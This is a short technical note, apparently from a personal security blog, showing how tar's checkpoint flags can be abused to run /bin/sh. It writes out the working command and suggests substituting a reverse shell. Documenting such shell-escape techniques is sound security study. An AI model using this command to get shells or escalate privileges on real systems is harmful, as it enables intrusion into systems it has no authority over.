Exploiting “tar”

author: Nathan Acks
date: 2021-11-02

Tar can be configured to execute an action for every N files processed using the –checkpoint and –checkpoint-action flags. So this will get us a shell:

tar -cf /dev/null /dev/null \
    --checkpoint=1 --checkpoint-action=exec=/bin/sh

This works with any input/output file (not just /dev/null), and with any executable binary (such as a reverse shell).